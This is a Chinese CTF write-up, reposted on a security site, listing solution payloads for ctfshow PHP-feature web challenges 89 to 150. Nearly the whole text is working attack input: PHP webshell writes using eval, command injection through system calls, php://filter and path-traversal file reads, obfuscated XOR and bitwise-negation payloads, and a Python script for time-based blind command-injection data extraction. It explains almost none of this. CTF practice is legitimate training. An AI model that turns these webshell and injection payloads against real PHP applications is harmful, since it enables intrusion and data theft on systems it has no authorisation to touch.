【原创】ctfshow—php特性 (89—150)

admin 2023年1月2日16:20:15CTF专场评论2 views2903字阅读9分40秒阅读模式

[huayang]web89

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?num[]=

web90

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?num=4476.

web91

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?cmd=%Aphp

web92

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?num=0x117c

web93

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?num=010574

web94

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?num=4476.0001

web95

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?num=+010574

web96

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?u=../html/flag.php

web97

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
a[]=&b[]=

web98

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
flag=xx&HTTP_FLAG=flag

web99

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?n=1.php post:content=<?php eval($_GET[1]);?>

多点几次

访问1.php

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)

web102-103

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php
post:v1=hex2bin

点一次就行了别点多了

【原创】ctfshow—php特性 (89—150)

web104

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
get:
?v2[]=
post:
v1[]=

web105

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
get:
?suces=flag
post:
error=suces

web106

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
get:
?v2[]=2
post:
v1[]=1

web107

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)

md5特性

get:
?v3=520610708
post:
v1=flag=0

web108

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?c=a%00778

web109

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)

Exception 异常处理类 http://c.biancheng.net/view/6253.html

?v1=Exception&v2=system('nl fl36dg.txt')

web110

【原创】ctfshow—php特性 (89—150)
?v1=FilesystemIterator&v2=getcwd
【原创】ctfshow—php特性 (89—150)

访问即可

web111

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
 ?v1=ctfshow&v2=GLOBALS

web112

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?file=php://filter/resource=flag.php

web113

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p
roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro
c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/
self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se
lf/root/proc/self/root/var/www/html/flag.php

web114

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?file=php://filter/resource=flag.php

web115

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
/?num=%0C36

web123、125、126

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?$fl0g=flag_give_me;                           #GET
CTF_SHOW=6&CTF[SHOW.COM=6&fun=eval($a[0])      #POST  

web127

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?ctf show=ilove36d

web128

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?f1=_&f2=get_defined_vars

web129

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php

方法二 目录穿越

【原创】ctfshow—php特性 (89—150)
?f=/ctfshow/../../../../var/www/html/flag.php

web130

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
payload:
post:
f=ctfshow

web131

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
import requests
url="http://a6def013-abd1-4e17-881d-90c5d3bcc7ad.chall.ctf.show/"
data={
	'f':'very'*250000+'36Dctfshow'
}
r=requests.post(url,data=data)
print(r.text)

web132

/admin
【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?username=admin&password=1&code=admin

web134

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?_POST[key1]=36d&_POST[key2]=36d

web136

【原创】ctfshow—php特性 (89—150)

当前目录

?c= ls |tee 1
【原创】ctfshow—php特性 (89—150)

根目录

?c= ls /|tee 1
【原创】ctfshow—php特性 (89—150)

直接读取

?c=nl  /f149_15_h3r3|tee 1
【原创】ctfshow—php特性 (89—150)

web137

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
ctfshow=ctfshow::getflag

web138

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
ctfshow[0]=ctfshow&ctfshow[1]=getFlag

web139

【原创】ctfshow—php特性 (89—150)

问就是羽师傅的

import requests
import time
import string
str=string.digits+string.ascii_lowercase+"-"
result=""
key=0
for j in range(1,45):
	print(j)
	if key==1:
		break
	for n in str:
		payload="if [ `cat /f149_15_h3r3|cut -c {0}` == {1} ];then sleep 3;fi".format(j,n)
		#print(payload)
		url="http://12acd425-0054-4af3-be5e-fe5aa467c5b3.chall.ctf.show/?c="+payload
		try:
			requests.get(url,timeout=(2.5,2.5))
		except:
		    result=result+n
		    print(result)
		    break
【原创】ctfshow—php特性 (89—150)

web140

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
 f1=usleep&f2=usleep

web141

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?v1=1&v3=-(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5)-&v2=1

web142

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?v1=0

web143

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?v1=1&v3=*("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0b%01%03%00%06%00"^"%7f%60%60%20%60%2a")*&v2=1

web144

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?v1=1&v3=-&v2=(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5)

web145

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?v1=1&v3=?(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5):&v2=1

web146

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?v1=1&v3===(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5)||&v2=1

web147

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
get
?show=;};system('grep flag flag.php');/*
post
ctf=%5ccreate_function

web148

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
?code=$哈="`{{{"^"?<>/";${$哈}[哼](${$哈}[嗯]);&哼=system&嗯=tac f*

web149

【原创】ctfshow—php特性 (89—150)
?ctf=index.php
show=<?php eval($_POST[a]);?>
【原创】ctfshow—php特性 (89—150)
a=system('ls /');
【原创】ctfshow—php特性 (89—150)
a=system('nl /ctfshow_fl0g_here.txt');
【原创】ctfshow—php特性 (89—150)

web150

【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)
【原创】ctfshow—php特性 (89—150)

[/huayang]

FROM:浅浅淡淡[hellohy]

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月2日16:20:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【原创】ctfshow—php特性 (89—150) http://cn-sec.com/archives/1493977.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: